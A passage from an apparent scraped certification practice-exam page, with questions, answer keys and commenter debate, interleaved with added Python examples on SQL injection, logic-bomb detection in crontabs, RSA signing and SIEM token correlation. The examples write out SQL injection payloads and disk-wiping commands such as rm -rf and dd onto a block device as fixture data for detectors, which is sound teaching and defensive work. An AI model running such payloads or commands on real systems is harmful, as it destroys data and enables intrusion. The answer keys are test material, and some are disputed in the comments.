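    return bool(SQLI_RE.search(unquote_plus(request_path)))


# Constructed WAF-log-style entries for the host in the question.
WAF_LOG = [
    "GET /login?user=%27%20OR%201%3D1%20--&pw=x HTTP/1.1 10.10.1.1",
    "GET /search?q=red+shoes HTTP/1.1 10.10.1.1",
    "GET /item?id=1%20UNION%20SELECT%20username,password_hash%20FROM%20users HTTP/1.1 10.10.1.1",
]


def flag_waf_entries(lines):
    """Return the request paths in the constructed WAF log that match the heuristic."""
    flagged = []
    for line in lines:
        path = line.split()[1]          # "GET <path> HTTP/1.1 <dst>"
        if looks_like_sqli(path):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    db = setup()
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterized:", login_parameterized(db, PAYLOAD, "anything"))
    print("flagged      :", flag_waf_entries(WAF_LOG))
```

With the payload the concatenated query becomes `... WHERE username = '' OR 1=1 --' AND password_hash = 'anything'`: the comment swallows the password check and `1=1` makes the filter true for every row, so the vulnerable version returns all three users and the parameterized one returns none. The WAF regex is a signature, not a fix; the parameterized query is the fix.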
Question #100 Topic 1

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments through a
single firewall?

A. Transit gateway

B. Cloud hot site

C. Edge computing

D. DNS sinkhole

Correct Answer: A

Community vote distribution

A (100%)

  stoneface Highly Voted  5 months ago
Selected Answer: A
VPC peering relationships can quickly become difficult to manage, especially if each VPC must interconnect in a mesh-like structure. A transit
gateway is a simpler means of managing these interconnections. Essentially, a transit gateway is a virtual router that handles routing between the
subnets in each attached VPC and any attached VPN gateways (aws.amazon.com/transit-gateway).
upvoted 18 times

  Jakalan7 Highly Voted  4 months, 2 weeks ago
Selected Answer: A
A is the only answer that makes sense here.
upvoted 6 times

  ronniehaang Most Recent  4 days, 16 hours ago
Selected Answer: A
a transit gateway is a virtual router that handles routing between the subnets in each attached VPC and any attached VPN gateways
upvoted 1 times

  kameel1221 4 days, 22 hours ago
Hardest Question in Ohio
upvoted 1 times

  DALLASCOWBOYS 5 days, 19 hours ago
A. Transit gateway establishes a simple and seamless integration of VPCs and local systems through a central hub or cloud router.
upvoted 1 times

Question #101 Topic 1

A DBA reports that several production server hard drives were wiped over the weekend. The DBA also reports that several Linux servers were
unavailable due to system files being deleted unexpectedly. A security analyst verified that software was configured to delete data deliberately
from those servers. No backdoors to any servers were found. Which of the following attacks was MOST likely used to cause the data loss?

A. Logic bomb

B. Ransomware

C. Fileless virus

D. Remote access Trojans

E. Rootkit

Correct Answer: A

Community vote distribution

A (86%) 10%

  stoneface Highly Voted  5 months ago
Selected Answer: A
"software was configured to delete data deliberately from those servers"

This could be achieved by a cronjob
upvoted 16 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago
A. Logic bomb would suggest software was configured to be deleted data deliberately from the servers.
upvoted 1 times

  Nirmalabhi 2 months ago
It's a trap. I also first thought it was rootkit, but I'll go with logic bomb. Although no conditions are specified, the question says it happened over the weekend, which
means the software was configured to delete data automatically over the weekend.
upvoted 2 times

  Conejo_Negro 2 months ago
Selected Answer: C
I believe the answer is C, Fileless virus. Rootkits usually require a back door; the question states no back door was found. There is no pattern or condition
stated in the question. The "software was configured to delete data from those servers". Fileless attacks usually attach themselves to legitimate
software. https://www.trellix.com/en-us/security-awareness/ransomware/what-is-fileless-malware.html
upvoted 2 times

  Sandon 2 weeks ago
That ain't it
upvoted 1 times

  tek7ila 2 months ago
Selected Answer: E
I also sway to the ROOTKIT. "no BACKDOOR was found" <---- a rootkit hides its presence; that's why no backdoor was found.

The term ROOTKIT derives from UNIX/Linux where any process running as root has unrestricted access to everything from the root of the file
system down.
upvoted 1 times

  Sandon 2 weeks ago
That ain't it
upvoted 1 times

  Jossie_C 3 months ago
Key word is deliberately, i.e., intentionally. It's a trap
upvoted 1 times

  EDSAL 4 months, 3 weeks ago
A Logic bomb
upvoted 1 times

  gen2dee 4 months, 3 weeks ago
"software was configured"

upvoted 2 times
  WondaByte 4 months, 3 weeks ago
Correct Answer E
Rootkit fits the answer to the question. A condition has to be true for Logic Bomb to occur which in this case isn't there. Correct Answer E
upvoted 3 times

  Orean 3 months ago
The condition could be time-based, meaning the logic bomb might have been set to activate at a specified date and time—such as the
weekend of the data wipe.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago
Hey everyone, this is NOT the right answer.
upvoted 2 times

  Halaa 4 months, 3 weeks ago
But no BACKDOOR was found.
upvoted 4 times

  Boogie_79 5 months ago
Selected Answer: A
Its simply LOGIC
upvoted 2 times

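One concrete way a time-triggered logic bomb of the kind described is planted, and the check an analyst would run to find it, as an added example that is not part of the original page or its comments: a root crontab is scanned for commands that destroy data, and each hit is tagged with whether its schedule is restricted to weekend days. The crontab contents and the list of destructive-command patterns are this example's own constructions; the cron framing follows stoneface's remark above and is not something the question establishes.

```python
"""Audit a crontab for destructive, weekend-scheduled jobs (logic-bomb hunting).

Added example, not code from the original page. The crontab content and the
destructive-command patterns are constructed assumptions for illustration.
"""
import re

# Constructed root crontab. Fields: minute hour day-of-month month day-of-week command
CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
30 3 * * 6 /bin/rm -rf /var/lib/postgresql/*
0 4 * * sun dd if=/dev/zero of=/dev/sda bs=1M
*/15 * * * * /usr/bin/find /tmp -mtime +7 -delete
0 1 * * 1-5 /usr/bin/logrotate /etc/logrotate.conf
"""

# (pattern, reason) pairs; an assumed starting list, extend for your environment
DESTRUCTIVE = [
    (re.compile(r"\brm\s+(-\w*r\w*\s+|-\w*f\w*\s+)+/"), "recursive/forced rm on an absolute path"),
    (re.compile(r"\bdd\b.*\bof=/dev/"), "dd writing to a block device"),
    (re.compile(r"\b(shred|wipefs|mkfs(\.\w+)?)\b"), "disk wipe / reformat tool"),
    (re.compile(r"\bfind\s+/(?!tmp\b).*-delete\b"), "find -delete outside /tmp"),
]

DOW_NAMES = {"sun": 0, "mon": 1, "tue": 2, "wed": 3, "thu": 4, "fri": 5, "sat": 6}
WEEKEND = {0, 6, 7}   # cron accepts both 0 and 7 for Sunday


def _day(token: str) -> int:
    return DOW_NAMES[token.lower()] if token.isalpha() else int(token)


def parse_dow(field: str):
    """Expand a day-of-week field ('*', '6', '0,6', '1-5', 'sun') into a set of ints."""
    if field == "*":
        return set(range(7))
    days = set()
    for part in field.split(","):
        lo, _, hi = part.partition("-")
        lo_i = _day(lo)
        hi_i = _day(hi) if hi else lo_i
        days.update(range(lo_i, hi_i + 1))
    return days


def audit_crontab(text: str):
    """Return one finding per job whose command matches a destructive pattern."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        dow, command = fields[4], fields[5]
        for pattern, reason in DESTRUCTIVE:
            if pattern.search(command):
                findings.append({
                    "command": command,
                    "reason": reason,
                    # a job that can only ever fire on Sat/Sun matches the question's timeline
                    "weekend_only": parse_dow(dow) <= WEEKEND,
                })
                break
    return findings


if __name__ == "__main__":
    for f in audit_crontab(CRONTAB):
        tag = "WEEKEND " if f["weekend_only"] else "        "
        print(tag + f["reason"] + ": " + f["command"])
```

The two flagged jobs have no backdoor, no network listener and no malware binary to find; they are ordinary scheduler entries whose trigger is a day of the week, which is why the scenario reads as a logic bomb rather than a rootkit or a RAT. The same sweep belongs on systemd timers, at jobs and database-side schedulers, which this example does not cover.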
Question #102 Topic 1

Digital signatures use asymmetric encryption. This means the message is encrypted with:

A. the sender's private key and decrypted with the sender's public key.

B. the sender's public key and decrypted with the sender's private key.

C. the sender's private key and decrypted with the recipient's public key.

D. the sender's public key and decrypted with the recipient's private key.

Correct Answer: A

Community vote distribution

A (86%) 14%

  stoneface Highly Voted  5 months ago
In order to verify the authenticity of a digital signature we need to encrypt the initial message with the sender's private key.
The receiver then can verify the authenticity by decrypting the message with the sender's public key.

https://docs.huihoo.com/globus/gt4-tutorial/ch09s03.html
upvoted 20 times

  Knowledge33 Highly Voted  3 months, 1 week ago
Selected Answer: A
There are 2 general ways to use an asymmetric algorithm.
1 - For communication between 2 hosts: If Bob sends a message to Alice, Bob uses Alice's public key to encrypt the message, and Alice uses
her private key to decrypt the message.
2 - For digital signature/authentication: If Alice needs to authenticate Bob, Bob uses his private key to sign the message, and Alice uses the
public key of Bob to decrypt the message. This process helps to make sure the signature is owned by Bob.
On this example, A is totally correct.
upvoted 10 times

  scarceanimal 13 hours, 45 minutes ago
I NEVER KNEW THIS wow ty
upvoted 1 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago
A. If the sender wants to digitally sign a message(Bob), Bob encrypts the message using his private key. When the recipient(Judy) receives the
digitally signed message, Judy decrypts the digital signature using Bob's public key.
upvoted 1 times

  carpathia 2 months, 1 week ago
Selected Answer: A
This question is wonky. They mention 'message encryption', which is encrypt with the recipient's public certificate (key) and decrypt with the recipient's
private key (cert). Instead of encryption they should have written SIGN. But I am guessing it is A, as in sign an email.
upvoted 1 times

  Queenica 2 months, 1 week ago
Asymmetric Key
My PRIVATE KEY is MINE. Not Shared with anyone.
Message I encrypt with MY PRIVATE KEY.
I send MY PUBLIC KEY to You.
Message reaches you You Decrypt with MY PUBLIC KEY.
upvoted 5 times

  Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: A
Digital signatures are used to verify authenticity and non-repudiation, as only the real sender would have the private key. Everybody with the
sender's public key could decrypt the message and therefore validate that it really comes from the original sender.
upvoted 1 times

  deeden 4 months, 2 weeks ago
Selected Answer: A
https://cheapsslsecurity.com/blog/wp-content/uploads/2018/09/how-do-digital-signatures-and-digital-certificates-work-together-in-ssl.png
upvoted 1 times

  mark9999 4 months, 2 weeks ago
Be careful here. They are asking about digital signatures - so the sender signs with the private key and it's validated by the senders public key.
This is answer A but they've replaced sign and hash with encrypt and decrypt, which is really confusing.
upvoted 3 times

  EDSAL 4 months, 3 weeks ago
A is the answer
upvoted 1 times

  ksave 4 months, 3 weeks ago
Selected Answer: A
Confusing question. Digital signature provides integrity (by creating hash) and not confidentiality. Then the question asks about encryption.
Choosing answer A as it is the only reasonable answer for digital signature process.
upvoted 3 times

  Halaa 4 months, 3 weeks ago
Selected Answer: A
an asymmetric key system encrypts using a public key and decrypts with a private key. For digital signatures, however, the reverse is true. The
signature is encrypted using the private key and decrypted with the public key.
upvoted 4 times

  Sandon 2 weeks ago
This is why I was confused
upvoted 1 times

  hazeleyes 4 months, 3 weeks ago
Selected Answer: A
This is definitely A. To those saying D I have a simple question for you: the sender's public key and the recipient's private key aren't even the same key
pair, how can you decrypt it?
upvoted 2 times

  Ay_ma 4 months, 4 weeks ago
Selected Answer: D
Asymmetric Encryption example:

Pretend you’re a spy agency and you need to devise a mechanism for your agents to report in securely. You don’t need two-way communication,
they have their orders, you just need regular detailed reports coming in from them. Asymmetric encryption would allow you to create public keys
for the agents to encrypt their information and a private key back at headquarters that is the only way to decrypt it all. This provides an
impenetrable form of one-way communication.
upvoted 1 times

  andrizo 3 months, 3 weeks ago
but the sender encrypts with their private key
upvoted 1 times

  okay123 5 months ago
Digital signatures work through public key cryptography's two mutually authenticating cryptographic keys. The individual who creates the digital
signature uses a private key to encrypt signature-related data, while the only way to decrypt that data is with the signer's public key.

https://www.techtarget.com/searchsecurity/definition/asymmetric-
cryptography#:~:text=Asymmetric%20encryption%20uses%20a%20mathematically,key%20is%20used%20for%20decryption.

I was also confused until i read signature. Good question! :)
upvoted 1 times

  varun0 5 months ago
Selected Answer: A
It's a digital signature, people in the comments who are saying D have it confused with asymmetric encryption.
upvoted 3 times

  DUCKDOG 5 months ago
Selected Answer: A
Obviously A. I agree with stoneface.

http://guides.brucejmack.net/SOA-Patterns/WSSP/13.1PublicKeyEncryptDigSigDoc.htm
upvoted 3 times

  kiosk99 5 months ago
Selected Answer: A
Answer is A, as per the link provided by stoneface. Don't get confused with secure conversation vs digital signature. One is to ensure
confidentiality while the other is non-repudiation.

Definitely not D because even for secure conversation you encrypt with the recipient's (not the sender's) public key and the recipient decrypts with their
private key.
upvoted 3 times


  kiosk99 5 months ago


Refer to #105
upvoted 1 times

Question #103 Topic 1

A security engineer was assigned to implement a solution to prevent attackers from gaining access by pretending to be authorized users. Which
of the following technologies meets the requirement?

A. SSO

B. IDS

C. MFA

D. TPM

Correct Answer: C

Community vote distribution


C (100%)

  DALLASCOWBOYS 5 days, 19 hours ago


C. Multifactor authentication.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: C
C - Multi Factor Authentication (MFA)
upvoted 3 times

  Josh_Feng 5 months ago


Selected Answer: C
C is correct since MFA = harder to impersonate due to having multifactor authentication.
upvoted 3 times

  Papee 3 months, 2 weeks ago


Is MFA a technology?
upvoted 1 times

  EubertT 2 months, 3 weeks ago


Yes, MFA is a technology. Multifactor authentication (MFA) is a security technology that requires multiple methods of authentication from
independent categories of credentials to verify a user's identity for a login or other transaction.
upvoted 1 times


Question #104 Topic 1

The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are
in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?

A. GDPR compliance attestation

B. Cloud Security Alliance materials

C. SOC 2 Type 2 report

D. NIST RMF workbooks

Correct Answer: C

Community vote distribution


C (86%) 14%

  redsidemanc2 Highly Voted  4 months, 4 weeks ago


Selected Answer: C
GDPR relates to the EU; nothing in the question says they are in the EU.

SOC 2 Type 2: tests the security controls in place.


upvoted 5 times

  ScottT 4 months, 3 weeks ago


https://www.itgovernance.co.uk/soc-reporting
upvoted 1 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


C. In the SOC 2 Type 2 report, the auditor confirms that the controls are functioning properly.
upvoted 1 times

  Nirmalabhi 2 months ago


Do not overthink. The question is simply about auditing; note the words in the question: "...has requested that a third-party vendor provide
supporting documents." Hence the correct answer is indeed SOC 2. See below, directly from Professor Messer's notes:

If your organization has undergone an audit, then you’re probably familiar with the SSAE SOC 2 types I and II. This is from the American Institute
of Certified Public Accountants, or the AICPA. It’s an auditing standard called the Statement on Standards for Attestation Engagements number
18, or SSAE 18. During these audits, there’s a series of reports that are created, and the name for the suite of reports that are associated with
trust services criteria, or security controls, is the SOC 2, that’s the System and Organization Controls number two. This audit focuses on topics
that can include firewalls, intrusion prevention, or intrusion detection, or multi-factor authentication.
upvoted 3 times

  atrax 2 months, 3 weeks ago


Selected Answer: C
I work in GRC, and third-party vendors provide a SOC 2 report. GDPR is almost a law where they state their compliance, but it's never
audited/certified.
upvoted 1 times

  Knowledge33 2 months, 3 weeks ago


Selected Answer: A
The SOC 2 is a separate report that focuses on controls at a service provider relevant to security, availability, processing integrity, confidentiality,
and privacy of a system. GDPR is the only possible response, even though it's only applied in the EU. The other responses are not related to client
data.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


GDPR only applies when the entity operates or collects data in any EU country. This question doesn't specify if the personal information in
question belongs to an EU member country. Therefore, we can eliminate option A. If the question stated anything at all about Europe, it would be
A. Since it didn't, SOC 2 Type 2 is the correct answer.

It's basically a modernized security audit that occurs usually at a minimum of every 6 months. A 3rd party supplying the results from its internal
SOC 2 Type 2 audit would provide the required supporting documents to satisfy the CISO.
upvoted 2 times

  stoneface 5 months, 1 week ago


I am split between SOC Type 2 and GDPR compliance ->
SOC Type 2 -> A SOC 2 Type 2 report is an internal controls report capturing how a company safeguards customer data and how well those
controls are operating. Companies that use cloud service providers use SOC 2 reports to assess and address the risks associated with third
party technology services.


GDPR Compliance Attestations -> ATC 315 also helps mature your internal controls over GDPR compliance and can help you manage GDPR
compliance risk beyond what internal risk assessments and audits provide. ATC 315 can identify deficiencies in internal controls, pinpoint areas
for improvement, and will strengthen your organization’s GDPR compliance posture.

It seems that SOC Type 2 Report better matches the requirement.

I listen to you ...


upvoted 4 times

  andrizo 3 months, 3 weeks ago


GDPR only applies to collection of consumer data in Europe.
upvoted 1 times

  KetReeb 5 months ago


SOC Type 2 Report would verify that the vendor is an organization that maintains a high level of information security.
upvoted 1 times

Question #105 Topic 1

Which of the following is assured when a user signs an email using a private key?

A. Non-repudiation

B. Confidentiality

C. Availability

D. Authentication

Correct Answer: A

Community vote distribution


A (100%)

  IQ30 Highly Voted  5 months ago


Selected Answer: A
Professor Messer notes:
• Non-Repudiation
– Confirm the authenticity of data
– Digital signature provides both integrity and non-repudiation
upvoted 9 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago


A. Non-repudiation. It is a concept that the sender cannot deny that they sent the message.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Non-repudiation is your virtual John Hancock. It's a way of virtually stamping any data or document with "I am who I say I am". The only way to
break this would be if the private key owner's private key became compromised, at which point you have bigger problems than non-repudiation.
upvoted 3 times

  Gino_Slim 3 months, 1 week ago


"John Hancock" is another way of saying "signature" for those that don't know
upvoted 2 times

  EDSAL 4 months, 3 weeks ago


A - Non-repudiation confirms that the signature comes from where it says it comes from.
upvoted 2 times
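The point the thread keeps circling (sign with the sender's private key, verify with the sender's public key; encrypt to the recipient's public key for confidentiality) as an added, runnable illustration. This is not code from ExamTopics or any commenter: it is textbook RSA with small constructed primes and the standard library only, deliberately insecure, so the key directions can be checked by hand.

```python
"""Toy RSA: sign with the private key, verify with the public key.

Added example for study purposes; it is not code from the ExamTopics page or
from any commenter. It uses textbook RSA with small constructed primes and the
standard library only, so it is NOT secure and must never be used for real
keys. It exists to show which key does what:

  * non-repudiation / integrity: the SENDER signs with their private key and
    anyone verifies with the sender's public key (Question #105);
  * confidentiality: the sender encrypts with the RECIPIENT's public key and
    only the recipient's private key decrypts (the other direction).
"""
import hashlib
from math import gcd


def keygen(p: int, q: int, e: int = 65537):
    """Return ((n, e), (n, d)) for the primes p and q (constructed inputs)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    return (n, e), (n, d)


def digest(message: bytes, n: int) -> int:
    """SHA-256 of the message reduced mod n: a toy stand-in for hash + padding."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key) -> int:
    """Only the holder of d can produce this value, hence non-repudiation."""
    n, d = private_key
    return pow(digest(message, n), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Anyone holding the signer's PUBLIC key can check the signature."""
    n, e = public_key
    return pow(signature, e, n) == digest(message, n)


def encrypt(plaintext: int, recipient_public) -> int:
    """Confidentiality runs the other way: encrypt to the recipient's public key."""
    n, e = recipient_public
    if not 0 <= plaintext < n:
        raise ValueError("plaintext must be an integer smaller than n")
    return pow(plaintext, e, n)


def decrypt(ciphertext: int, recipient_private) -> int:
    n, d = recipient_private
    return pow(ciphertext, d, n)


def demo() -> dict:
    """Run the signing and encryption flows; returns the checks as booleans."""
    # Constructed toy primes (about 2^20 each); trivially factorable, demo only.
    alice_pub, alice_priv = keygen(1_000_003, 1_000_033)
    bob_pub, bob_priv = keygen(1_000_037, 1_000_039)

    email = b"Please wire 100 to account 42"  # constructed sample message
    sig = sign(email, alice_priv)
    results = {
        # Alice's public key confirms Alice (and only Alice) signed exactly this.
        "valid_signature": verify(email, sig, alice_pub),
        # Any change to the message breaks the signature (integrity).
        "tampered_message": verify(b"Please wire 1000 to account 42", sig, alice_pub),
        # Verifying with someone else's public key fails: the signature binds Alice.
        "wrong_signer_key": verify(email, sig, bob_pub),
    }

    # Confidentiality: Alice encrypts to BOB's public key; only Bob's private key opens it.
    secret = 424242
    ciphertext = encrypt(secret, bob_pub)
    results["bob_decrypts"] = decrypt(ciphertext, bob_priv) == secret
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check:>17}: {outcome}")
```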


Question #106 Topic 1

A systems administrator is troubleshooting a server's connection to an internal web server. The administrator needs to determine the correct ports
to use. Which of the following tools BEST shows which ports on the web server are in a listening state?

A. ipconfig

B. ssh

C. ping

D. netstat

Correct Answer: D

Community vote distribution


D (92%) 8%

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: D
Answer is D

A. ipconfig - Just shows you the IP information for your current machine
B. ssh - this is used for file transfers (ftp etc etc)
C. ping - this is just to reach out to a node to get a response from it

These are simple ways of explaining. Don't come behind me and get real granular, super duper tech people -_-
upvoted 15 times

  scarceanimal 13 hours, 35 minutes ago


thanks gino slim!
upvoted 1 times

  rodwave 2 months, 3 weeks ago


the explanations are perfectly fine
upvoted 3 times

  comeragh Highly Voted  5 months ago


Selected Answer: D
Netstat shows listening ports
upvoted 8 times

  T4IT Most Recent  1 week, 6 days ago


Selected Answer: A
Netstat is correct
upvoted 2 times


Question #107 Topic 1

Which of the following BEST reduces the security risks introduced when running systems that have expired vendor support and lack an immediate
replacement?

A. Implement proper network access restrictions.

B. Initiate a bug bounty program.

C. Classify the system as shadow IT.

D. Increase the frequency of vulnerability scans.

Correct Answer: A

Community vote distribution


A (100%)

  Jakalan7 Highly Voted  4 months, 2 weeks ago


Selected Answer: A
A is the only answer that makes sense here.
upvoted 8 times

  Papee 3 months, 2 weeks ago


I agree. Network segmentation.
upvoted 3 times

  03allen 2 months, 3 weeks ago


I don't think A means network segmentation.
upvoted 1 times

  Ranaer Most Recent  1 week, 3 days ago


Selected Answer: A
We are asked to REDUCE risk.
A. Implement proper network access restrictions. - This more or less reduces risk by limiting who has access to the legacy system.
B. Initiate a bug bounty program. - We don't need that, since it's a legacy system, which we haven't developed. We most likely cannot patch this
anyway.
C. Classify the system as shadow IT. - Irrelevant to the question.
D. Increase the frequency of vulnerability scans. - As in B, us knowing that issues exist won't help us much, since we cannot patch the system.
upvoted 1 times

  mick1 1 month, 4 weeks ago


I would say D - as the system is not changing role, and in ANY use case, network access should be minimized (or at least planned for the system) - so if I
don't want to change the device role, just reduce risk, I would go with more scans.
upvoted 1 times

  KingDrew 3 weeks ago


Unfortunately that doesn't reduce the risk; they can still attack, and the scans will only detect that attack, not reduce the probability
of it happening. I choose A.
upvoted 1 times

  Jossie_C 3 months ago


Prevent the computer from connecting to the internet where the bad guys are
upvoted 1 times


Question #108 Topic 1

Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the
following will the company MOST likely reference for guidance during this change?

A. The business continuity plan

B. The retention policy

C. The disaster recovery plan

D. The incident response plan

Correct Answer: A

Community vote distribution


A (84%) C (16%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
BCP is to empower an organization to keep crucial functions running during downtime. This, in turn, helps the organization respond quickly to an
interruption, while creating resilient operational protocols.
upvoted 16 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer - The business continuity plan

A business continuity plan ensures a company can maintain core operations without interruption, especially in the event of a crisis.

===========================
Retention Policy - determines how long a business record/resource is stored and how to dispose of the record when it is time to do so.

Disaster Recovery - A set of instructions created by an organization on how to respond to and recover from unplanned incidents, generally
involving a hardware failure, destruction, etc.

Incident Response - a set of steps an incident response team follows to properly prepare for and respond to incidents.
upvoted 5 times

  tebirkishaw Most Recent  2 days, 15 hours ago


Selected Answer: C
It is C. The business continuity plan goes over what you can do in the event you can't access your normal resources, or if things aren't working.
For example if your payment portal is down, you would have something saying you take payments by phone. In this question they have all of
their resources, just working at a different site. Professor Messer's videos on this explain it really well as well.
upvoted 1 times

  tebirkishaw 2 days, 15 hours ago


Actually I had my definitions mixed up lol... I think the answer would be A
upvoted 1 times

  DALLASCOWBOYS 5 days, 19 hours ago


A. Business Continuity Plans focus on keeping an organization functional when misfortune or incidents occur. The reason for the vacating of the
office isn't specified, so there is no way, based on the information provided, to say that a disaster (natural or man-made) has occurred.
upvoted 1 times

  Sandon 2 weeks ago


Selected Answer: C
ChatGPT says it's C
upvoted 2 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: A
A seems like the correct answer
upvoted 2 times

  carpathia 2 months, 1 week ago


Selected Answer: A
This should normally be BIA, but BIA is part of BCP, so BCP.
upvoted 1 times


  DoDaResearch 2 months, 4 weeks ago


Selected Answer: C
See CompTIA Security+ Study Guide page 518.
Disaster Recovery Plan -- A disaster can be seen as a special class of incident where the organization's primary business function is disrupted.
Disaster recovery requires considerable resources, such as SHIFTING PROCESSING TO A SECONDARY SITE. Disaster recovery will involve a
wider range of stakeholders than less serious incidents.
Business Continuity Plan (BCP) -- This identifies how business processes should deal with both minor and disaster-level disruption. During an
incident, a system may need to be isolated. Continuity planning ensures that there is processing redundancy supporting the workflow so that
when a server is taken offline for security remediation, processing can fail over to a separate system. If systems do not have this sort of planned
resilience, incident response will be much more disruptive.
upvoted 2 times

  DoDaResearch 2 months, 4 weeks ago


Not all disasters are natural, if a fire marshal closes your building for various reasons that may not even be related to your building, you still
can not enter
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Remember that BCP is all-encompassing, including natural disaster recovery. Since the question did not specify this is a disaster, then BCP is
the only option left that can be correct.
upvoted 1 times

  Yuyuyakuza 4 months, 4 weeks ago


A. BCP; no indication of a natural disaster.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
Agree with A - BCP
upvoted 2 times


Question #109 Topic 1

While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse
moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?

A. Utilizing SIEM correlation engines

B. Deploying Netflow at the network border

C. Disabling session tokens for all sites

D. Deploying a WAF for the web server

Correct Answer: D

Community vote distribution


A (100%)


  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
I think that SIEM correlation would be the best way to detect an attacker in this case.

The initial compromise was a malicious request on a web server. Moments later the token created with SSO was used on another service, the
question does not specify what type of service.

Deploying a WAF on the web server will detect the attacker but only on that server. If the attacker issues the same malicious request to get
another SSO token, correlating that event with the use of that SSO token in other services would allow us to detect the malicious activity.

Correct me if I am wrong
upvoted 26 times

  hieptran 3 weeks, 3 days ago


I think the same as you.
The token type could vary, but I don't think that it will be detected and prevented by a WAF or anything, since it could be a legitimate
request with a stolen/hacked token.
In the context of this question, it is best to correlate logs and find which system is compromised.
upvoted 1 times

  brewoz404sd 1 day, 19 hours ago


Answer is D. A WAF looks specifically at session/token use, as well as monitoring all traffic between web/user. You can deploy a WAF to protect
ALL web apps behind it. Answer is clearly D; it's exactly what a WAF is designed to do.
upvoted 1 times

  nukimoya 2 months ago


I still think D
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


SIEM correlation dashboards. From google:

"It aggregates and analyzes log data from across your network applications, systems, and devices, making it possible to discover security threats
and malicious patterns of behaviors that otherwise go unnoticed and can lead to compromise or data loss."

A web application firewall is a good candidate, except that it will log both events into separate log files, which can go unnoticed by security
administrators and will require additional tools, such as a SIEM, to automate the process of alerting on the correlated events together.
upvoted 4 times
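What the "correlate the two events" argument above (stoneface's and Gravoc's posts) looks like as an actual rule, as an added example that is not from ExamTopics or any commenter: a small SIEM-style correlation over constructed log lines from several services. The JSON schema, field names, service names and IP addresses are all assumptions made for the demo.

```python
"""SIEM-style correlation of SSO token reuse across services.

Added example, not code from the ExamTopics page or any commenter. It models
the scenario in Question #109: a web application raises an alert for a
malicious request, and moments later the same SSO token shows up on a
different service. A WAF on one server sees only its own traffic; the
correlation below needs events from every service in one place, which is
what a SIEM provides. The JSON line format, field names, services and IPs
are all constructed for this demo.
"""
import json
from datetime import datetime, timedelta

# Constructed sample log lines, already normalised to a common schema.
SAMPLE_LOGS = """\
{"ts": "2023-02-04T19:20:01Z", "service": "webapp", "event": "malicious_request", "user": "alice", "sso_token": "tok_7f3a", "src_ip": "203.0.113.9", "detail": "SQLi pattern in query string"}
{"ts": "2023-02-04T19:20:07Z", "service": "fileshare", "event": "token_accepted", "user": "alice", "sso_token": "tok_7f3a", "src_ip": "198.51.100.77"}
{"ts": "2023-02-04T19:25:00Z", "service": "webapp", "event": "token_accepted", "user": "bob", "sso_token": "tok_91cc", "src_ip": "198.51.100.4"}
{"ts": "2023-02-04T19:30:00Z", "service": "webapp", "event": "malicious_request", "user": "carol", "sso_token": "tok_55e0", "src_ip": "203.0.113.50", "detail": "path traversal"}
{"ts": "2023-02-04T19:30:30Z", "service": "webapp", "event": "token_accepted", "user": "carol", "sso_token": "tok_55e0", "src_ip": "203.0.113.50"}
{"ts": "2023-02-04T19:40:00Z", "service": "mail", "event": "token_accepted", "user": "bob", "sso_token": "tok_91cc", "src_ip": "198.51.100.4"}
{"ts": "2023-02-04T19:50:00Z", "service": "mail", "event": "token_accepted", "user": "carol", "sso_token": "tok_55e0", "src_ip": "203.0.113.50"}
"""


def parse_events(text: str) -> list:
    """Parse JSON lines into event dicts with a real datetime in 'ts'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def correlate(events: list, window: timedelta = timedelta(minutes=5)) -> list:
    """Flag an SSO token that was tied to a malicious request on one service
    and then accepted by a DIFFERENT service within the window.

    Reuse on the same service is left to that service's own WAF; reuse after
    the window falls outside this rule. A new source IP raises the severity,
    since the token is now being presented from somewhere else.
    """
    suspect = {}  # sso_token -> the malicious_request event that tainted it
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        token = ev.get("sso_token")
        if not token:
            continue
        if ev["event"] == "malicious_request":
            suspect[token] = ev  # latest taint wins
            continue
        trigger = suspect.get(token)
        if trigger is None or ev["service"] == trigger["service"]:
            continue
        delta = ev["ts"] - trigger["ts"]
        if delta > window:
            continue
        alerts.append({
            "sso_token": token,
            "user": ev.get("user"),
            "first_service": trigger["service"],
            "second_service": ev["service"],
            "delta_seconds": int(delta.total_seconds()),
            "severity": "high" if ev.get("src_ip") != trigger.get("src_ip") else "medium",
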